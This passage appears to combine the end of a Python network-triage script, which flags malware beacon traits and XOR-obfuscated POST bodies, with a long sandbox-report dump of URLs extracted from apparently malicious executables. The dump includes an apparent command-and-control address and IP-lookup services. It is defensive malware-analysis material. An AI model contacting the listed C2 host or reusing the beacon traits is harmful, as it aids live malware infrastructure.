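        hits.append("host-is-ip-literal")        # hard-coded C2 address, nothing to sinkhole
    if host and host not in dns_queries:
        hits.append("no-dns-query-for-host")     # the report's "without corresponding DNS query"
    if LEGACY_UA.search(h.get("user-agent", "")):
        hits.append("legacy-msie6-user-agent")
    if req["method"] == "POST" and h.get("cache-control") == "no-cache" and "content-type" not in h:
        hits.append("typeless-no-cache-post")    # opaque body, no Content-Type, cache bypass
    return hits


def triage(requests=REQUESTS, dns_queries=DNS_QUERIES):
    """(host, path, indicators) for every request that has at least one indicator."""
    out = []
    for raw in requests:
        hits = beacon_indicators(raw, dns_queries)
        if hits:
            req = parse_request(raw)
            out.append((req["headers"]["host"], req["path"], hits))
    return out


def body_consistent(raw, body):
    """Content-Length of the request head matches the captured body length."""
    return int(parse_request(raw)["headers"].get("content-length", -1)) == len(body)


def stride_profile(data, period):
    """Fraction of bytes with the high bit set in each column i mod period.
    ASCII text is ~0 everywhere; XOR with a short repeating key lifts whole
    columns above 0x80 wherever the key byte for that column is >= 0x80."""
    columns = [data[i::period] for i in range(period)]
    return tuple(round(sum(b >= 0x80 for b in col) / len(col), 2) for col in columns)


def ascii_projection(data):
    """The printable bytes only, i.e. what the report prints as "Data Ascii"."""
    return "".join(chr(b) for b in data if 0x20 <= b < 0x7F)


if __name__ == "__main__":
    for host, path, hits in triage():
        print(host, path, ", ".join(hits))
    print("length ok:", body_consistent(REQUESTS[1], POST_BODY))
    for period in (1, 2, 3, 4):
        print("period", period, stride_profile(POST_BODY, period))
    print(ascii_projection(POST_BODY))
```

The period-3 profile is the analyst's signal: one column entirely above 0x80 and two columns entirely below it means the body is structured, not compressed or encrypted with a real cipher, and is worth carrying to static analysis of update.exe (whose WinINet import chain is listed just above) rather than treating as noise.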
                    Source: update.exe, 00000015.00000003.2470147501.0000000000777000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/
                    Source: update.exe, 00000015.00000003.2470147501.0000000000777000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000075A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000075A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.html
                    Source: update.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.000000000078A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.html_
                    Source: update.exe, 00000015.00000002.2483935326.000000000075A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000075A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.htmlb
                    Source: update.exe, 00000015.00000003.2482146112.000000000073F000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2481863455.00000000069D0000.00000004.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000074A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000074A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.php
                    Source: update.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.phpM
                    Source: update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.phpmswsock.dll.mui
                    Source: update.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.63.192.63/index.phpv
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | String found in binary or memory: http://aia.startssl.com/certs/ca.crt0
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | String found in binary or memory: http://aia.startssl.com/certs/sca.code2.crt06
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777304241.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783534951.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755919665.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756224938.000000000497D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://bot.whatismyipaddress.com
                    Source: ETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://counter-strike.com.ua/
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.dr | String found in binary or memory: http://crl.startssl.com/sca-code2.crl0#
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://crl.startssl.com/sfsca.crl0f
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.u
                    Source: update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ocsp.startssl.com00
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ocsp.startssl.com07
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000002.2929217475.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: http://s.symcd.com06
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1929110914.0000000006261000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com
                    Source: cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com/0
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/contacts.php?program=
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2009801141.0000000003F58000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2004458585.0000000003F4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com/info/versions/
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2004458585.0000000003F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com/info/versions/k
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/reg.php?program=
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/subscription/?action=extend&key=
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/subscription/?action=latest&key=
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/windows-explorer/embed/H
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.com/windows-explorer/extensions.phpH
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3V$mP$mP
                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3Y4=A4=AhXInno
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3_lmPlmP
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3c
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3d
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3e
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3f
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3g
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3h
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3j
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3l
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.com3t
                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co
                    Source: ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.chameleon-managers.comH
                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000021C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comQN
                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comS
                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comSQ
                    Source: cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.comc
                    Source: cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chameleon-managers.coms
